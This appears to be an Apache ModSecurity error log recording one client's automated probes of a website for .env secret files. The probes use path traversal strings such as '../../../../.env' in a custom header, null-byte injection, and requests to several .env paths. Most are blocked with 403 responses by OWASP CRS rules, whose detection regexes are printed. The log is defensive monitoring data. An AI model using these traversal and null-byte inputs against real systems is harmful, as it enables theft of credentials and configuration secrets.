[Tue May 12 04:39:27.601449 2026] [security2:error] [pid 1820198:tid 1820212] [client 45.148.10.166:37388] ModSecurity: Warning. Matched phrase "../" at REQUEST_HEADERS:X-Load-Config. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "34"] [id "930110"] [rev "1"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: ../ found within REQUEST_HEADERS:X-Load-Config: ../../../../../.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "www.tchatbooster.com"] [uri "/health"] [unique_id "agKS381tk6y7yBJLpJopuwAAAIw"], referer: https://tchatbooster.com/health?X-App-Env=%00
[Tue May 12 04:39:27.601938 2026] [security2:error] [pid 1820198:tid 1820212] [client 45.148.10.166:37388] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 31)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.tchatbooster.com"] [uri "/health"] [unique_id "agKS381tk6y7yBJLpJopuwAAAIw"], referer: https://tchatbooster.com/health?X-App-Env=%00
[Tue May 12 04:39:27.691600 2026] [security2:error] [pid 1730175:tid 1730192] [client 45.148.10.166:37448] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "tchatbooster.com"] [uri "/index.php"] [unique_id "agKS33o6NvB9WXx5V-6e5gAAAQ8"]
[Tue May 12 04:39:27.704241 2026] [security2:error] [pid 1825179:tid 1825220] [client 45.148.10.166:37416] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.tchatbooster.com"] [uri "/index.php"] [unique_id "agKS39r1yOh9TvizeziP4wAAAFY"], referer: https://tchatbooster.com/assets../../../.env
[Tue May 12 04:39:27.715538 2026] [security2:error] [pid 1730207:tid 1730213] [client 45.148.10.166:37432] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /public/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.tchatbooster.com"] [uri "/public/.env"] [unique_id "agKS3zue9Sp-pIv_Bb61SgAAAUQ"], referer: https://tchatbooster.com/public/.env
[Tue May 12 04:39:27.715749 2026] [security2:error] [pid 1730207:tid 1730213] [client 45.148.10.166:37432] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.tchatbooster.com"] [uri "/public/.env"] [unique_id "agKS3zue9Sp-pIv_Bb61SgAAAUQ"], referer: https://tchatbooster.com/public/.env
[Tue May 12 04:39:27.730925 2026] [core:error] [pid 1730175:tid 1730192] [client 45.148.10.166:37448] AH10244: invalid URI path (/assets../../../../.env)
[Tue May 12 04:39:27.977922 2026] [security2:error] [pid 1820198:tid 1820205] [client 45.148.10.166:36568] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "tchatbooster.com"] [uri "/index.php"] [unique_id "agKS381tk6y7yBJLpJopuQAAAIU"]
[Tue May 12 04:39:27.997318 2026] [security2:error] [pid 1825179:tid 1825220] [client 45.148.10.166:37416] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.tchatbooster.com"] [uri "/api/.env"] [unique_id "agKS39r1yOh9TvizeziP5gAAAFY"], referer: https://tchatbooster.com/api/.env
[Tue May 12 04:39:27.997491 2026] [security2:error] [pid 1825179:tid 1825220] [client 45.148.10.166:37416] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.tchatbooster.com"] [uri "/api/.env"] [unique_id "agKS39r1yOh9TvizeziP5gAAAFY"], referer: https://tchatbooster.com/api/.env
[Tue May 12 04:39:28.301612 2026] [security2:error] [pid 1820198:tid 1820212] [client 45.148.10.166:37388] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 31 - SQLI=0,XSS=0,RFI=0,LFI=15,RCE=0,PHPI=0,HTTP=0,SESS=0): Path Traversal Attack (/../)"] [tag "event-correlation"] [hostname "www.tchatbooster.com"] [uri "/index.php"] [unique_id "agKS381tk6y7yBJLpJopuwAAAIw"], referer: https://tchatbooster.com/health?X-App-Env=%00
[Tue May 12 04:39:28.329659 2026] [security2:error] [pid 1820198:tid 1820205] [client 45.148.10.166:36568] ModSecurity: Warning. Found 1 byte(s) in REQUEST_URI outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "tchatbooster.com"] [uri "/health"] [unique_id "agKS4M1tk6y7yBJLpJopvQAAAIU"]
[Tue May 12 04:39:28.329709 2026] [security2:error] [pid 1820198:tid 1820205] [client 45.148.10.166:36568] ModSecurity: Warning. Found 1 byte(s) in REQUEST_HEADERS:X-App-Env outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "tchatbooster.com"] [uri "/health"] [unique_id "agKS4M1tk6y7yBJLpJopvQAAAIU"]
[Tue May 12 04:39:28.329737 2026] [security2:error] [pid 1820198:tid 1820205] [client 45.148.10.166:36568] ModSecurity: Warning. Found 1 byte(s) in ARGS:X-App-Env outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "tchatbooster.com"] [uri "/health"] [unique_id "agKS4M1tk6y7yBJLpJopvQAAAIU"]
[Tue May 12 04:39:28.329957 2026] [security2:error] [pid 1820198:tid 1820205] [client 45.148.10.166:36568] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_HEADERS:X-Load-Config. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_HEADERS:X-Load-Config: ../../.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "tchatbooster.com"] [uri "/health"] [unique_id "agKS4M1tk6y7yBJLpJopvQAAAIU"]
[Tue May 12 04:39:28.330007 2026] [security2:error] [pid 1820198:tid 1820205] [client 45.148.10.166:36568] ModSecurity: Warning. Matched phrase "../" at REQUEST_HEADERS:X-Load-Config. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "34"] [id "930110"] [rev "1"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: ../ found within REQUEST_HEADERS:X-Load-Config: ../../.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "tchatbooster.com"] [uri "/health"] [unique_id "agKS4M1tk6y7yBJLpJopvQAAAIU"]
[Tue May 12 04:39:28.330039 2026] [security2:error] [pid 1820198:tid 1820205] [client 45.148.10.166:36568] ModSecurity: Warning. Matched phrase "../" at REQUEST_HEADERS:X-Load-Config. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "34"] [id "930110"] [rev "1"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: ../ found within REQUEST_HEADERS:X-Load-Config: ../../.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "tchatbooster.com"] [uri "/health"] [unique_id "agKS4M1tk6y7yBJLpJopvQAAAIU"]
[Tue May 12 04:39:28.330456 2026] [security2:error] [pid 1820198:tid 1820205] [client 45.148.10.166:36568] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 27)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "tchatbooster.com"] [uri "/health"] [unique_id "agKS4M1tk6y7yBJLpJopvQAAAIU"]
[Tue May 12 04:39:28.427134 2026] [security2:error] [pid 1730207:tid 1730213] [client 45.148.10.166:37432] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.tchatbooster.com"] [uri "/index.php"] [unique_id "agKS3zue9Sp-pIv_Bb61SgAAAUQ"], referer: https://tchatbooster.com/public/.env
[Tue May 12 04:39:28.443748 2026] [security2:error] [pid 1820198:tid 1820202] [client 45.148.10.166:57166] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.tchatbooster.com"] [uri "/.env"] [unique_id "agKS4M1tk6y7yBJLpJopvgAAAII"], referer: https://tchatbooster.com/assets../../../../.env
[Tue May 12 04:39:28.443978 2026] [security2:error] [pid 1820198:tid 1820202] [client 45.148.10.166:57166] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.tchatbooster.com"] [uri "/.env"] [unique_id "agKS4M1tk6y7yBJLpJopvgAAAII"], referer: https://tchatbooster.com/assets../../../../.env
[Tue May 12 04:39:28.496088 2026] [security2:error] [pid 1730207:tid 1730226] [client 45.148.10.166:36592] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /storage/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "tchatbooster.com"] [uri "/storage/.env"] [unique_id "agKS4Due9Sp-pIv_Bb61TAAAAVE"]
[Tue May 12 04:39:28.496254 2026] [security2:error] [pid 1730207:tid 1730226] [client 45.148.10.166:36592] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "tchatbooster.com"] [uri "/storage/.env"] [unique_id "agKS4Due9Sp-pIv_Bb61TAAAAVE"]
[Tue May 12 04:39:28.670630 2026] [security2:error] [pid 1825179:tid 1825220] [client 45.148.10.166:37416] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.tchatbooster.com"] [uri "/index.php"] [unique_id "agKS39r1yOh9TvizeziP5gAAAFY"], referer: https://tchatbooster.com/api/.env
[Tue May 12 04:39:28.796138 2026] [security2:error] [pid 1820198:tid 1820205] [client 45.148.10.166:36568] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 27 - SQLI=0,XSS=0,RFI=0,LFI=15,RCE=0,PHPI=0,HTTP=0,SESS=0): Path Traversal Attack (/../)"] [tag "event-correlation"] [hostname "tchatbooster.com"] [uri "/index.php"] [unique_id "agKS4M1tk6y7yBJLpJopvQAAAIU"]
[Tue May 12 04:39:28.850434 2026] [security2:error] [pid 1825179:tid 1825220] [client 45.148.10.166:37416] ModSecurity: Warning. Found 1 byte(s) in REQUEST_URI outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "www.tchatbooster.com"] [uri "/health"] [unique_id "agKS4Nr1yOh9TvizeziP6AAAAFY"], referer: https://tchatbooster.com/health?X-App-Env=%00
[Tue May 12 04:39:28.850481 2026] [security2:error] [pid 1825179:tid 1825220] [client 45.148.10.166:37416] ModSecurity: Warning. Found 1 byte(s) in REQUEST_HEADERS:Referer outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "www.tchatbooster.com"] [uri "/health"] [unique_id "agKS4Nr1yOh9TvizeziP6AAAAFY"], referer: https://tchatbooster.com/health?X-App-Env=%00
[Tue May 12 04:39:28.850507 2026] [security2:error] [pid 1825179:tid 1825220] [client 45.148.10.166:37416] ModSecurity: Warning. Found 1 byte(s) in REQUEST_HEADERS:X-App-Env outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "www.tchatbooster.com"] [uri "/health"] [unique_id "agKS4Nr1yOh9TvizeziP6AAAAFY"], referer: https://tchatbooster.com/health?X-App-Env=%00
[Tue May 12 04:39:28.850531 2026] [security2:error] [pid 1825179:tid 1825220] [client 45.148.10.166:37416] ModSecurity: Warning. Found 1 byte(s) in ARGS:X-App-Env outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "www.tchatbooster.com"] [uri "/health"] [unique_id "agKS4Nr1yOh9TvizeziP6AAAAFY"], referer: https://tchatbooster.com/health?X-App-Env=%00
[Tue May 12 04:39:28.850741 2026] [security2:error] [pid 1825179:tid 1825220] [client 45.148.10.166:37416] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_HEADERS:X-Load-Config. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_HEADERS:X-Load-Config: ../../.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "www.tchatbooster.com"] [uri "/health"] [unique_id "agKS4Nr1yOh9TvizeziP6AAAAFY"], referer: https://tchatbooster.com/health?X-App-Env=%00
[Tue May 12 04:39:28.850794 2026] [security2:error] [pid 1825179:tid 1825220] [client 45.148.10.166:37416] ModSecurity: Warning. Matched phrase "../" at REQUEST_HEADERS:X-Load-Config. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "34"] [id "930110"] [rev "1"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: ../ found within REQUEST_HEADERS:X-Load-Config: ../../.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "www.tchatbooster.com"] [uri "/health"] [unique_id "agKS4Nr1yOh9TvizeziP6AAAAFY"], referer: https://tchatbooster.com/health?X-App-Env=%00
[Tue May 12 04:39:28.850829 2026] [security2:error] [pid 1825179:tid 1825220] [client 45.148.10.166:37416] ModSecurity: Warning. Matched phrase "../" at REQUEST_HEADERS:X-Load-Config. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "34"] [id "930110"] [rev "1"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: ../ found within REQUEST_HEADERS:X-Load-Config: ../../.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "www.tchatbooster.com"] [uri "/health"] [unique_id "agKS4Nr1yOh9TvizeziP6AAAAFY"], referer: https://tchatbooster.com/health?X-App-Env=%00
[Tue May 12 04:39:28.851267 2026] [security2:error] [pid 1825179:tid 1825220] [client 45.148.10.166:37416] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 31)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.tchatbooster.com"] [uri "/health"] [unique_id "agKS4Nr1yOh9TvizeziP6AAAAFY"], referer: https://tchatbooster.com/health?X-App-Env=%00
[Tue May 12 04:39:29.066233 2026] [ssl:error] [pid 1820198:tid 1820220] (EAI 2)Name or service not known: [client 114.119.142.72:48699] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Tue May 12 04:39:29.066267 2026] [ssl:error] [pid 1820198:tid 1820220] AH01941: stapling_renew_response: responder error
[Tue May 12 04:39:29.152549 2026] [security2:error] [pid 1820198:tid 1820202] [client 45.148.10.166:57166] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.tchatbooster.com"] [uri "/index.php"] [unique_id "agKS4M1tk6y7yBJLpJopvgAAAII"], referer: https://tchatbooster.com/assets../../../../.env
[Tue May 12 04:39:29.176501 2026] [security2:error] [pid 1730207:tid 1730226] [client 45.148.10.166:36592] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "tchatbooster.com"] [uri "/index.php"] [unique_id "agKS4Due9Sp-pIv_Bb61TAAAAVE"]
[Tue May 12 04:39:29.176789 2026] [security2:error] [pid 1825287:tid 1825327] [client 45.148.10.166:36578] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /assets../../.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "tchatbooster.com"] [uri "/.env.local"] [unique_id "agKS4QgpmE1yW0glLdgfRwAAANU"]
